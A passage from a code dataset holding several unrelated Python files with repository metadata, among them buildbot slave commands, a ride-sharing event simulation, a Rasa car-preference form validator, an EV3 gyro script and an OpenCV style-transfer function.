d.addCallback(lambda res: commandComplete(cmd))\n return d\n\n def runRmdir(self, dir, **kwargs):\n \"\"\" remove a directory from the slave \"\"\"\n return self.runRemoteCommand('rmdir',\n {'dir': dir, 'logEnviron': self.logEnviron},\n **kwargs)\n\n def pathExists(self, path):\n \"\"\" test whether path exists\"\"\"\n def commandComplete(cmd):\n return not cmd.didFail()\n\n return self.runRemoteCommand('stat', {'file': path,\n 'logEnviron': self.logEnviron, },\n abandonOnFailure=False,\n evaluateCommand=commandComplete)\n\n def runMkdir(self, _dir, **kwargs):\n \"\"\" create a directory and its parents\"\"\"\n return self.runRemoteCommand('mkdir', {'dir': _dir,\n 'logEnviron': self.logEnviron, },\n **kwargs)\n\n def runGlob(self, glob):\n \"\"\" find files matching a shell-style pattern\"\"\"\n def commandComplete(cmd):\n return cmd.updates['files'][-1]\n\n return self.runRemoteCommand('glob', {'glob': glob,\n 'logEnviron': self.logEnviron, },\n evaluateCommand=commandComplete)\n","repo_name":"jollyroger/debian-buildbot","sub_path":"buildbot/steps/slave.py","file_name":"slave.py","file_ext":"py","file_size_in_byte":9215,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"72543814244","text":"\"\"\"Simulation Events\n\nThis file should contain all of the classes necessary to model the different\nkinds of events in the simulation.\n\"\"\"\nfrom rider import Rider, WAITING, CANCELLED, SATISFIED\nfrom dispatcher import Dispatcher\nfrom driver import Driver\nfrom location import Location, deserialize_location\nfrom monitor import Monitor, RIDER, DRIVER, REQUEST, CANCEL, PICKUP, DROPOFF\n\n\nclass Event:\n \"\"\"An event.\n\n Events have an ordering that is based on the event timestamp: Events with\n older timestamps are less than those with newer timestamps.\n\n This class is abstract; subclasses must implement do().\n\n You may, if you wish, change the API of this class to add\n extra public methods or attributes. Make sure that anything\n you add makes sense for ALL events, and not just a particular\n event type.\n\n Document any such changes carefully!\n\n === Attributes ===\n @type timestamp: int\n A timestamp for this event.\n \"\"\"\n\n def __init__(self, timestamp):\n \"\"\"Initialize an Event with a given timestamp.\n\n @type self: Event\n @type timestamp: int\n A timestamp for this event.\n Precondition: must be a non-negative integer.\n @rtype: None\n\n >>> Event(7).timestamp\n 7\n \"\"\"\n self.timestamp = timestamp\n\n # The following six 'magic methods' are overridden to allow for easy\n # comparison of Event instances. All comparisons simply perform the\n # same comparison on the 'timestamp' attribute of the two events.\n def __eq__(self, other):\n \"\"\"Return True iff this Event is equal to .\n\n Two events are equal iff they have the same timestamp.\n\n @type self: Event\n @type other: Event\n @rtype: bool\n\n >>> first = Event(1)\n >>> second = Event(2)\n >>> first == second\n False\n >>> second.timestamp = first.timestamp\n >>> first == second\n True\n \"\"\"\n return self.timestamp == other.timestamp\n\n def __ne__(self, other):\n \"\"\"Return True iff this Event is not equal to .\n\n @type self: Event\n @type other: Event\n @rtype: bool\n\n >>> first = Event(1)\n >>> second = Event(2)\n >>> first != second\n True\n >>> second.timestamp = first.timestamp\n >>> first != second\n False\n \"\"\"\n return not self == other\n\n def __lt__(self, other):\n \"\"\"Return True iff this Event is less than .\n\n @type self: Event\n @type other: Event\n @rtype: bool\n\n >>> first = Event(1)\n >>> second = Event(2)\n >>> first < second\n True\n >>> second < first\n False\n \"\"\"\n return self.timestamp < other.timestamp\n\n def __le__(self, other):\n \"\"\"Return True iff this Event is less than or equal to .\n\n @type self: Event\n @type other: Event\n @rtype: bool\n\n >>> first = Event(1)\n >>> second = Event(2)\n >>> first <= first\n True\n >>> first <= second\n True\n >>> second <= first\n False\n \"\"\"\n return self.timestamp <= other.timestamp\n\n def __gt__(self, other):\n \"\"\"Return True iff this Event is greater than .\n\n @type self: Event\n @type other: Event\n @rtype: bool\n\n >>> first = Event(1)\n >>> second = Event(2)\n >>> first > second\n False\n >>> second > first\n True\n \"\"\"\n return not self <= other\n\n def __ge__(self, other):\n \"\"\"Return True iff this Event is greater than or equal to .\n\n @type self: Event\n @type other: Event\n @rtype: bool\n\n >>> first = Event(1)\n >>> second = Event(2)\n >>> first >= first\n True\n >>> first >= second\n False\n >>> second >= first\n True\n \"\"\"\n return not self < other\n\n def __str__(self):\n \"\"\"Return a string representation of this event.\n\n @type self: Event\n @rtype: str\n \"\"\"\n raise NotImplementedError(\"Implemented in a subclass\")\n\n def do(self, dispatcher, monitor):\n \"\"\"Do this Event.\n\n Update the state of the simulation, using the dispatcher, and any\n attributes according to the meaning of the event.\n\n Notify the monitor of any activities that have occurred during the\n event.\n\n Return a list of new events spawned by this event (making sure the\n timestamps are correct).\n\n Note: the \"business logic\" of what actually happens should not be\n handled in any Event classes.\n\n @type self: Event\n @type dispatcher: Dispatcher\n @type monitor: Monitor\n @rtype: list[Event]\n \"\"\"\n raise NotImplementedError(\"Implemented in a subclass\")\n\n\nclass RiderRequest(Event):\n \"\"\"A rider requests a driver.\n\n === Attributes ===\n @type rider: Rider\n The rider.\n \"\"\"\n def __init__(self, timestamp, rider):\n \"\"\"Initialize a RiderRequest event.\n\n @type self: RiderRequest\n @type rider: Rider\n @rtype: None\n \"\"\"\n super().__init__(timestamp)\n self.rider = rider\n\n def do(self, dispatcher, monitor):\n \"\"\"Assign the rider to a driver or add the rider to a waiting list.\n If the rider is assigned to a driver, the driver starts driving to\n the rider.\n\n Return a Cancellation event. If the rider is assigned to a driver,\n also return a Pickup event.\n\n @type self: RiderRequest\n @type dispatcher: Dispatcher\n @type monitor: Monitor\n @rtype: list[Event]\n \"\"\"\n monitor.notify(self.timestamp, RIDER, REQUEST,\n self.rider.identifier, self.rider.origin)\n\n events = []\n # assigns driver if there are drivers, else putting rider onto\n # waiting list\n driver = dispatcher.request_driver(self.rider)\n # if there is a driver\n if driver is not None:\n # find how long it'll take to get to driver\n travel_time = driver.start_drive(self.rider.origin)\n # adds to event list, the pick up time, rider name and driver name\n events.append(Pickup(self.timestamp + travel_time, self.rider,\n driver))\n # add to event list, the time the rider will cancel and rider's name\n events.append(Cancellation(self.timestamp + self.rider.patience,\n self.rider))\n\n return events\n\n def __str__(self):\n \"\"\"Return a string representation of this event.\n\n @type self: RiderRequest\n @rtype: str\n\n >>> rider = Rider('xyz', Location(1, 2), Location(3, 3), 3)\n >>> r1 = RiderRequest(3, rider)\n >>> print(r1)\n 3 -- ID: xyz, Origin: (1,2), Destination: (3,3), Status: waiting, Patience: 3: Request a driver\n >>> rider_z = Rider('eggshells', Location(0, 2), Location(3, 2), 1)\n >>> r2 = RiderRequest(0, rider)\n >>> print(r2)\n 0 -- ID: xyz, Origin: (1,2), Destination: (3,3), Status: waiting, Patience: 3: Request a driver\n \"\"\"\n return \"{} -- {}: Request a driver\".format(self.timestamp, self.rider)\n\n\nclass DriverRequest(Event):\n \"\"\"A driver requests a rider.\n\n === Attributes ===\n @type driver: Driver\n The driver.\n \"\"\"\n\n def __init__(self, timestamp, driver):\n \"\"\"Initialize a DriverRequest event.\n\n @type self: DriverRequest\n @type driver: Driver\n @rtype: None\n \"\"\"\n super().__init__(timestamp)\n self.driver = driver\n\n def do(self, dispatcher, monitor):\n \"\"\"Register the driver, if this is the first request, and\n assign a rider to the driver, if one is available.\n\n If a rider is available, return a Pickup event.\n\n @type self: DriverRequest\n @type dispatcher: Dispatcher\n @type monitor: Monitor\n @rtype: list[Event]\n\n Writing multiple examples for the DriverRequest class is not feasible because it would require the\n initialization of a monitor and a dispatcher. However it is not sufficient to just initialize these objects\n without relevant driver and rider data and since it is a simulation, we would not get a good understanding\n how the DriverRequest interacts with and spawns other relevant Events. Furthermore, these examples add\n very little value for testing the functionality of this method because the method itself is dependant on\n helper methods that will have already been tested.\n \"\"\"\n # Notify the monitor about the request.\n monitor.notify(self.timestamp, DRIVER, REQUEST,\n self.driver.identifier, self.driver.location)\n events = []\n # Request a rider from the dispatcher.\n rider = dispatcher.request_rider(self.driver)\n # If there is one available, the driver starts driving towards the rider\n if rider is not None:\n # time taken to drive to pick up location\n travel_time = self.driver.start_drive(rider.origin)\n # the method returns a Pickup event for when the driver\n events.append(Pickup(self.timestamp + travel_time, rider,\n self.driver))\n return events\n\n def __str__(self):\n \"\"\"Return a string representation of this event.\n\n @type self: DriverRequest\n @rtype: str\n\n >>> d1 = Driver('Sam', Location(1,1), 2)\n >>> dr = DriverRequest(3, d1)\n >>> print(dr)\n 3 -- ID: Sam, Location: (1,1), Speed: 2: Request a rider\n >>> d2 = Driver('boo', Location(1,1), 2)\n >>> dz = DriverRequest(0, d2)\n >>> print(dz)\n 0 -- ID: boo, Location: (1,1), Speed: 2: Request a rider\n \"\"\"\n return \"{} -- {}: Request a rider\".format(self.timestamp, self.driver)\n\n\nclass Cancellation(Event):\n \"\"\" Cancel a rider's request.\n\n === Attributes ===\n @param Rider rider: waiting rider requesting a ride\n \"\"\"\n\n def __init__(self, timestamp, rider):\n \"\"\"\n Initialize a cancellation event.\n\n @param Cancellation self: this Cancellation event\n @param Rider rider: waiting rider requesting a ride\n @rtype: None\n \"\"\"\n super().__init__(timestamp)\n self.rider = rider\n\n def __str__(self):\n \"\"\"Return a string representation of this cancellation event.\n\n @type self: Cancellation\n @rtype: str\n\n >>> rider = Rider('xyz', Location(1, 2), Location(3, 3), 3)\n >>> r1 = Cancellation(8, rider)\n >>> print(r1)\n 8 -- ID: xyz, Origin: (1,2), Destination: (3,3), Status: waiting, Patience: 3: Cancellation by rider\n >>> rider_z = Rider('eggshells', Location(0, 2), Location(3, 2), 1)\n >>> r2 = Cancellation(0, rider)\n >>> print(r2)\n 0 -- ID: xyz, Origin: (1,2), Destination: (3,3), Status: waiting, Patience: 3: Cancellation by rider\n \"\"\"\n return \"{} -- {}: Cancellation by rider\".format(self.timestamp,\n self.rider)\n\n def do(self, dispatcher, monitor):\n \"\"\"If a rider's pickup time is greater than the rider's patience then\n change the status of rider from waiting to cancelled.\n\n Don't schedule any future events.\n\n @type self: Cancellation\n @type dispatcher: Dispatcher\n @type monitor: Monitor\n @rtype: list[Event]\n\n Writing multiple examples for the Cancellation class is not feasible because it would require the\n initialization of a monitor and a dispatcher. However it is not sufficient to just initialize these objects\n without relevant driver and rider data and since it is a simulation, we would not get a good understanding\n how the Cancellation class interacts with and spawns other relevant Events. Furthermore, these examples add\n very little value for testing the functionality of this method because the method itself is dependant on\n helper methods that will have already been tested.\n \"\"\"\n\n # Notify the monotor about the request\n monitor.notify(self.timestamp, RIDER, CANCEL, self.rider.identifier, self.rider.origin)\n\n events = []\n # Check whether rider is satisfied.\n if self.rider not in dispatcher.rider[SATISFIED]:\n # If not satisfied, change status to cancelled and cancel ride.\n self.rider.status = CANCELLED\n dispatcher.cancel_ride(self.rider)\n return events\n\n\nclass Pickup(Event):\n \"\"\"\n A pickup event.\n\n === Attributes ===\n @param Rider rider: rider waiting to be picked up\n @param Driver driver: driver picking up rider\n \"\"\"\n\n def __init__(self, timestamp, rider, driver):\n \"\"\"\n Initialize a Pickup event.\n\n @param Pickup self: this pickup event\n @param int timestamp: time at which driver will pick up rider\n @param Rider rider: rider waiting to be picked up\n @param Driver driver: driver picking up rider\n @rtype: None\n \"\"\"\n super().__init__(timestamp)\n self.rider, self.driver = rider, driver\n\n def __str__(self):\n \"\"\"\n Return a string representation of this Pickup Event.\n\n @param Pickup self: This pickup event\n @rtype: str\n\n >>> rider = Rider('xyz', Location(1, 2), Location(3, 3), 3)\n >>> d1 = Driver('Sam', Location(1,1), 2)\n >>> p = Pickup(4, rider, d1)\n >>> print(p)\n 4 -- ID: Sam, Location: (1,1), Speed: 2 -- ID: xyz, Origin: (1,2), Destination: (3,3), Status: waiting, \\\nPatience: 3: Pick up time by driver of rider\n >>> rider_z = Rider('eggshells', Location(0, 2), Location(3, 2), 1)\n >>> d2 = Driver('boo', Location(1,1), 2)\n >>> p2 = Pickup(10, rider_z, d2)\n >>> print(p2)\n 10 -- ID: boo, Location: (1,1), Speed: 2 -- ID: eggshells, Origin: (0,2), Destination: (3,2), Status: waiting, \\\nPatience: 1: Pick up time by driver of rider\n \"\"\"\n\n return \"{} -- {} -- {}: Pick up time by driver of rider\".format(\n self.timestamp, self.driver, self.rider)\n\n def do(self, dispatcher, monitor):\n \"\"\"\n Set the driver's location to the rider's location.\n\n If the rider is waiting, dispatcher gives them a rider and the driver's\n destination becomes the rider's destination.\n Schedule a dropoff event for the time they will arrive a the rider's\n destination. Rider becomes satisfied.\n\n If rider has cancelled, the driver becomes idle and schedule a new event\n for the driver requesting a rider.\n\n @param Pickup self: this Pickup event.\n @param Dispatcher dispatcher:\n @param Monitor monitor:\n @rtype: list[Event]\n\n Writing multiple examples for the Pickup class is not feasible because it would require the\n initialization of a monitor and a dispatcher. However it is not sufficient to just initialize these objects\n without relevant driver and rider data and since it is a simulation, we would not get a good understanding\n how the Pickup class interacts with and spawns other relevant Events. Furthermore, these examples add\n very little value for testing the functionality of this method because the method itself is dependant on\n helper methods that will have already been tested.\n\n \"\"\"\n # End the drive to the pickup location.\n self.driver.end_drive()\n\n # Notify the monitor of about both the driver's and rider's pickup event.\n monitor.notify(self.timestamp, RIDER, PICKUP, self.rider.identifier, self.rider.destination)\n monitor.notify(self.timestamp, DRIVER, PICKUP, self.driver.identifier, self.driver.location)\n\n events = []\n # If rider has not cancelled\n if self.rider not in dispatcher.rider[CANCELLED]:\n # Get travel time and and start the ride\n travel_time = self.driver.start_ride(self.rider)\n # This creates a dropoff event for the rider\n events.append(Dropoff(self.timestamp + travel_time, self.rider, self.driver))\n # Rider is now satisfied as the ride is succsfully finished.\n self.rider.status = SATISFIED\n dispatcher.end_successful_ride(self.rider)\n\n # If rider has cancelled, driver will put in a new request\n else:\n events.append(DriverRequest(self.timestamp, self.driver))\n\n return events\n\n\nclass Dropoff(Event):\n \"\"\"\n A dropoff event.\n\n === Attributes ===\n @param Rider rider: rider being dropped off\n @param Driver driver: driver dropping off rider\n \"\"\"\n\n def __init__(self, timestamp, rider, driver):\n \"\"\"\n Initialize a dropoff event.\n\n @param Dropoff self: this Dropoff event\n @param int timestamp: time at which rider was dropped off\n @param Rider rider: rider being dropped off\n @param Driver driver: driver dropping off rider\n @rtype: None\n \"\"\"\n super().__init__(timestamp)\n self.rider, self.driver = rider, driver\n\n def __str__(self):\n \"\"\"\n Return a string representation of Dropoff event.\n\n @param Dropoff self: this dropoff event\n @rtype: str\n\n >>> rider = Rider('xyz', Location(1, 2), Location(3, 3), 3)\n >>> d1 = Driver('Sam', Location(1,1), 2)\n >>> d = Dropoff(4, rider, d1)\n >>> print(d)\n 4 -- ID: Sam, Location: (1,1), Speed: 2 -- ID: xyz, Origin: (1,2), Destination: (3,3), Status: waiting, \\\nPatience: 3: Dropoff time by driver of rider\n >>> rider_z = Rider('eggshells', Location(0, 2), Location(3, 2), 1)\n >>> d2 = Driver('boo', Location(1,1), 2)\n >>> p2 = Dropoff(10, rider_z, d2)\n >>> print(p2)\n 10 -- ID: boo, Location: (1,1), Speed: 2 -- ID: eggshells, Origin: (0,2), Destination: (3,2), Status: waiting, \\\nPatience: 1: Dropoff time by driver of rider\n \"\"\"\n\n return \"{} -- {} -- {}: Dropoff time by driver of rider\".format(self.timestamp, self.driver, self.rider)\n\n def do(self, dispatcher, monitor):\n \"\"\"\n Set the driver's location to the rider's destination.\n\n Change status of rider to satisfied.\n\n Driver becomes idle and requests a new rider.\n\n @type self: Dropoff\n @type dispatcher: Dispatcher\n @type monitor: Monitor\n @rtype: list[Event]\n\n Writing multiple examples for the Dropoff class is not feasible because it would require the\n initialization of a monitor and a dispatcher. However it is not sufficient to just initialize these objects\n without relevant driver and rider data and since it is a simulation, we would not get a good understanding\n how the Dropoff class interacts with and spawns other relevant Events. Furthermore, these examples add\n very little value for testing the functionality of this method because the method itself is dependant on\n helper methods that will have already been tested.\n \"\"\"\n\n # End the ride and arrive at rider's destination.\n self.driver.end_ride()\n\n # Notify monitor about Dropoff event.\n monitor.notify(self.timestamp, DRIVER, DROPOFF,\n self.driver.identifier, self.driver.location)\n\n # Once the ride is successful,driver will put in a new request\n events = [DriverRequest(self.timestamp, self.driver)]\n dispatcher.end_successful_ride(self.rider)\n return events\n\n\ndef create_event_list(filename):\n \"\"\"Return a list of Events based on raw list of events in .\n\n Precondition: the file stored at is in the format specified\n by the assignment handout.\n\n @param filename: str\n The name of a file that contains the list of events.\n @rtype: list[Event]\n\n No examples are provided as this method deals with opening a file.\n \"\"\"\n events = []\n\n # Read through file, strip white spaces and properly format Driver and Rider requests\n # as a list of events.\n\n with open(filename, \"r\") as file:\n for line in file:\n line = line.strip()\n\n if not line or line.startswith(\"#\"):\n continue\n\n tokens = line.split(\" \")\n timestamp = int(tokens[0])\n event_type = tokens[1]\n\n if event_type == \"DriverRequest\":\n identifier = tokens[2]\n location_ = deserialize_location(tokens[3])\n speed = int(tokens[4])\n driver = Driver(identifier, location_, speed)\n event_obj = DriverRequest(timestamp, driver)\n events.append(event_obj)\n\n elif event_type == \"RiderRequest\":\n ident = tokens[2]\n origin = deserialize_location(tokens[3])\n destination = deserialize_location(tokens[4])\n patience = int(tokens[5])\n rider = Rider(ident, origin, destination, patience, status=WAITING)\n event_obj = RiderRequest(timestamp, rider)\n events.append(event_obj)\n return events\n","repo_name":"uamarasinghe/ride_sharing_simulation","sub_path":"event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":21330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11085585442","text":"from replit import clear\nimport art\n\nprint(art.logo)\nentries = {}\ncontinueBid = \"yes\"\n\nwhile continueBid == \"yes\":\n name = input(\"What is you name? \\n\")\n bid = int(input(\"What's your bid? \\n$\"))\n optionNext = input(\"Are there other bidders? Type 'yes' or 'no' \\n\").lower()\n entries[name] = bid\n clear()\n print(entries)\n if optionNext == \"no\":\n continueBid = \"no\"\n\nscore = 0\nfor person in entries:\n if entries[person] > score:\n score = entries[person]\n nameOfPerson = person\n\nprint(f\"Highest bidder is {nameOfPerson} with a bid of ${score}\")\n","repo_name":"kelvin5hart/blind-auction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73188256484","text":"#!/usr/bin/env python3\nfrom ev3dev2.motor import OUTPUT_A, OUTPUT_D, MoveTank,SpeedRPS, follow_for_ms\nfrom ev3dev2.sensor.lego import GyroSensor\nfrom ev3dev2.sensor import INPUT_1\n\n# Instantiate the MoveTank object\ntank = MoveTank(OUTPUT_A, OUTPUT_D)\n\n# Initialize the tank's gyro sensor\ntank.gyro = GyroSensor(INPUT_1)\n\n# Calibrate the gyro to eliminate drift, and to initialize the current angle as 0\ntank.gyro.calibrate()\n\n\n # Follow the target_angle for 4500ms\ntank.follow_gyro_angle(\nkp=11.3, ki=0.05, kd=3.2,\nspeed=SpeedRPS(.5),\ntarget_angle=0,\nfollow_for=follow_for_ms,\nms=4500)\n\ntank.stop()","repo_name":"MasonTrippel/EV3RobotScripts","sub_path":"gyrotest.py","file_name":"gyrotest.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72517264166","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"ksalf\",\n version=\"0.0.2\",\n author=\"Benjamin Haegenlaeuer\",\n author_email=\"benni.haegenlaeuer@outlook.de\",\n description=\"A lightweight webserver implementation [inspired by flask]\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Haegi/ksalf\",\n packages=setuptools.find_packages(exclude=[\"test\"]),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"Haegi/ksalf","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13300163000","text":"# -*- coding: utf-8 -*-\n\nfrom gi.repository import GLib, Gtk\nfrom manyssh.win import Window\n\nimport json\nimport os\n\n\nclass Application(object):\n \"\"\"\n ManySSH application.\n \"\"\"\n\n def __init__(self, argv, *args, **kwargs):\n \"\"\"\n :param argv: argument list\n :type argv: list of str\n \"\"\"\n\n super(Application, self).__init__(*args, **kwargs)\n\n self.argv = argv\n\n def load_config(self):\n \"\"\" Load configuration. \"\"\"\n\n paths = []\n dirs = list(GLib.get_system_config_dirs())\n dirs.append(GLib.get_user_config_dir())\n\n paths = [\n p\n for p in [\n os.path.join(d, 'manyssh', 'clusters.conf')\n for d in dirs\n ] + ['clusters.conf']\n if os.path.exists(p)\n ]\n\n self.config = {}\n\n for path in paths:\n print('-- Loading configuration: {0}'.format(path))\n with open(path) as f:\n self.config.update(json.load(f))\n\n def parse_commandline(self):\n \"\"\" Parse argument list. \"\"\"\n\n if len(self.argv) < 2:\n raise RuntimeError('No cluster specified')\n\n cluster = self.argv[1]\n\n if cluster not in self.config:\n raise RuntimeError('Cluster {0} not found'.format(cluster))\n\n self.hosts = self.config[cluster]\n\n def init_ui(self):\n \"\"\" Initialize user interface. \"\"\"\n\n win = Window(self.hosts)\n win.connect('delete-event', Gtk.main_quit)\n win.show_all()\n\n Gtk.main()\n\n def __call__(self):\n \"\"\" Entry point. \"\"\"\n\n try:\n self.load_config()\n self.parse_commandline()\n self.init_ui()\n\n except RuntimeError as err:\n print('Error: {0}'.format(err))\n return 1\n\n return 0\n","repo_name":"linkdd/manyssh","sub_path":"manyssh/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"1702252033","text":"import cv2\nimport numpy as np\n\n#img = cv2.imread('./golden_gate.jpg')\n\ndef transform(img, net=cv2.dnn.readNetFromTorch('models/eccv16/composition_vii.t7')):\n h, w, c = img.shape\n img = cv2.resize(img, dsize=(500, int(h / w * 500)))\n # (325, 500, 3)\n\n MEAN_VALUE = [103.939, 116.779, 123.680]\n blob = cv2.dnn.blobFromImage(img, mean=MEAN_VALUE)\n\n # (1, 3, 325, 500)\n net.setInput(blob)\n output = net.forward()\n\n output = output.squeeze().transpose((1, 2, 0))\n output += MEAN_VALUE\n\n output = np.clip(output, 0, 255)\n output = output.astype('uint8')\n\n return output","repo_name":"MeoSeon12Jo/naegrimfarm-backend","sub_path":"deep_learning_with_images/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10868212005","text":"from typing import Dict, Text, Any, List, Union\r\n\r\nfrom rasa_sdk import Tracker\r\nfrom rasa_sdk.executor import CollectingDispatcher\r\nfrom rasa_sdk.forms import FormValidationAction\r\nfrom rasa_sdk import utils\r\nfrom knowledgebase.car_knowledgebase import CarKnowledgeBase\r\n\r\nclass ValidateOneDesireForm(FormValidationAction):\r\n\r\n def __init__(self):\r\n self.knowledge_base = CarKnowledgeBase(db='che300', user='root', password='password')\r\n\r\n def name(self) -> Text:\r\n return \"validate_one_desire_car_form\"\r\n\r\n @staticmethod\r\n def car_gear_type_db() -> List[Text]:\r\n \"\"\"Database of supported car gear type.\"\"\"\r\n\r\n return [\r\n \"手动\",\r\n \"自动\"\r\n ]\r\n\r\n @staticmethod\r\n def is_int(string: Text) -> bool:\r\n \"\"\"Check if a string is an integer.\"\"\"\r\n\r\n try:\r\n int(string)\r\n return True\r\n except ValueError:\r\n return False\r\n\r\n async def required_slots(\r\n self,\r\n domain_slots: List[Text],\r\n dispatcher: \"CollectingDispatcher\",\r\n tracker: \"Tracker\",\r\n domain: \"DomainDict\",\r\n ) -> List[Text]:\r\n updated_slots = domain_slots.copy()\r\n car_list = tracker.get_slot('car')\r\n if car_list is None or len(car_list) == 0:\r\n return []\r\n series_name = car_list[0]\r\n green_type_count = await utils.call_potential_coroutine(self.knowledge_base.get_green_type_count(series_name))\r\n if green_type_count <= 1:\r\n # If the car doesn't have a green energy model, no need to ask\r\n updated_slots.remove(\"is_green\")\r\n gear_type_count = await utils.call_potential_coroutine(self.knowledge_base.get_gear_type_count(series_name))\r\n if gear_type_count <= 1:\r\n updated_slots.remove(\"gear_type\")\r\n model_level = tracker.get_slot('model_level')\r\n if model_level and model_level != '无':\r\n updated_slots.remove(\"price\")\r\n updated_slots.remove(\"engine_power_kw\")\r\n return updated_slots\r\n\r\n def validate_model_level(\r\n self, value: Text, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict\r\n ) -> Dict[Text, Any]:\r\n if \"高\" in value or \"好\" in value:\r\n return {\"model_level\": \"高\"}\r\n elif \"中\" in value or \"一般\" in value or \"普通\" in value:\r\n return {\"model_level\": \"中\"}\r\n elif \"低\" in value or \"差\" in value:\r\n return {\"model_level\": \"低\"}\r\n else:\r\n return {\"model_level\": \"无\"}\r\n\r\n def validate_is_green(\r\n self,\r\n value: Text,\r\n dispatcher: CollectingDispatcher,\r\n tracker: Tracker,\r\n domain: Dict[Text, Any],\r\n ) -> Dict[Text, Any]:\r\n \"\"\"Validate car is_green value.\"\"\"\r\n if value == \"是\":\r\n # validation succeeded, set the value of the \"gear_type\" slot to value\r\n return {\"is_green\": 1}\r\n elif value == \"否\":\r\n return {\"is_green\": 0}\r\n else:\r\n dispatcher.utter_message(response=\"utter_wrong_is_green\")\r\n return {\"is_green\": None}\r\n\r\n def validate_gear_type(\r\n self,\r\n value: Text,\r\n dispatcher: CollectingDispatcher,\r\n tracker: Tracker,\r\n domain: Dict[Text, Any],\r\n ) -> Dict[Text, Any]:\r\n \"\"\"Validate car gear type value.\"\"\"\r\n if value in self.car_gear_type_db():\r\n # validation succeeded, set the value of the \"gear_type\" slot to value\r\n return {\"gear_type\": value}\r\n elif \"自动\" in value:\r\n return {\"gear_type\": \"自动\"}\r\n elif \"手动\" in value:\r\n return {\"gear_type\": \"手动\"}\r\n elif \"都行\" in value or \"随便\" in value or \"无\" in value or \"都可以\" in value:\r\n return {\"gear_type\": \"手动|自动\"}\r\n else:\r\n dispatcher.utter_message(response=\"utter_wrong_gear_type\")\r\n # validation failed, set this slot to None, meaning the\r\n # user will be asked for the slot again\r\n return {\"gear_type\": None}\r\n\r\n def validate_price(\r\n self,\r\n value: Text,\r\n dispatcher: CollectingDispatcher,\r\n tracker: Tracker,\r\n domain: Dict[Text, Any],\r\n ) -> Dict[Text, Any]:\r\n \"\"\"Validate car price range value.\"\"\"\r\n if self.is_int(value) and int(value) > 0:\r\n return {\"price\": int(value)}\r\n else:\r\n dispatcher.utter_message(response=\"utter_wrong_price\")\r\n # validation failed, set slot to None\r\n return {\"price\": None}\r\n\r\n def validate_engine_power_kw(\r\n self,\r\n value: Text,\r\n dispatcher: CollectingDispatcher,\r\n tracker: Tracker,\r\n domain: Dict[Text, Any],\r\n ) -> Dict[Text, Any]:\r\n \"\"\"Validate car engine_power value.\"\"\"\r\n if '大' in value or '好' in value:\r\n # validation succeeded, set the value of the \"cuisine\" slot to value\r\n return {\"engine_power_kw\": \"大\"}\r\n elif '中' in value or '一般' in value:\r\n # validation failed, set this slot to None, meaning the\r\n # user will be asked for the slot again\r\n return {\"engine_power_kw\": \"中\"}\r\n else:\r\n return {\"engine_power_kw\": \"小\"}\r\n","repo_name":"flygan1988/rasa-main","sub_path":"examples/carbot_v2/actions/validate_one_desire_car_form.py","file_name":"validate_one_desire_car_form.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8495002551","text":"from scipy.stats import crystalball\nimport numpy as np\nimport pandas as pd\nimport uproot\nimport matplotlib.pyplot as plt\nfig, ax = plt.subplots(1, 1)\n\ninput_file = uproot.open(\"trkana.Triggered.root\")\ninput_tree = input_file[\"TrkAnaNeg/trkana\"]\ndf = input_tree.pandas.df(flatten = False)\n\nfile2 = uproot.open(\"reco-Delta45-trig.root\")\nRPCReco2 = file2[\"TrkAnaNeg/trkana\"]\ndf2 = RPCReco2.pandas.df(flatten=False)\n\ndframes = [df, df2]\n\nresult = pd.concat(dframes)\n\ndata1 = result[\"deent.mom\"]\ndata = df2[\"deent.mom\"]\n\ny, bins = np.histogram(data, bins=100);\n\nbeta1 = 45\nm1 = 2\n\n# Convert histogram into a classical plot\ndx = bins[1] - bins[0]\n\nx = np.linspace(bins[0]+dx/2, bins[-1]-dx/2, 100)\n\nbeta, m,loc,scale = 1, 10,2,0.05\n#loc is how many units shifted to the left the thing is\n#scale is height of peak- divided by the scale\n#scale can't be negative\n\n\ndef CrystalBall(x,beta1,m1,loc,scale):#,beta2,m2):\n return (crystalball.pdf(x,beta1,m1,loc,scale)) #+ crystalball.pdf(x,beta2,m2)\n\nx = np.linspace(crystalball.ppf(0.01, beta, m),\n crystalball.ppf(0.99, beta, m), 100)\nax.plot(x, CrystalBall(x,beta, m,loc,scale))\nplt.xlim(-10,10)\nplt.ylim(-10,10)\n\nplt.xlim(-10,10)\n\nplt.show()","repo_name":"josephinetsai/Mu2e","sub_path":"practicecrystal.py","file_name":"practicecrystal.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34158484776","text":"import os\nimport sys\nimport glob\nimport argparse\nimport shutil\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport gc # memory garbage collector\n\n# Silence TensorFlow messages\n#0 = all messages are logged (default behavior)\n#1 = INFO messages are not printed\n#2 = INFO and WARNING messages are not printed\n#3 = INFO, WARNING, and ERROR messages are not 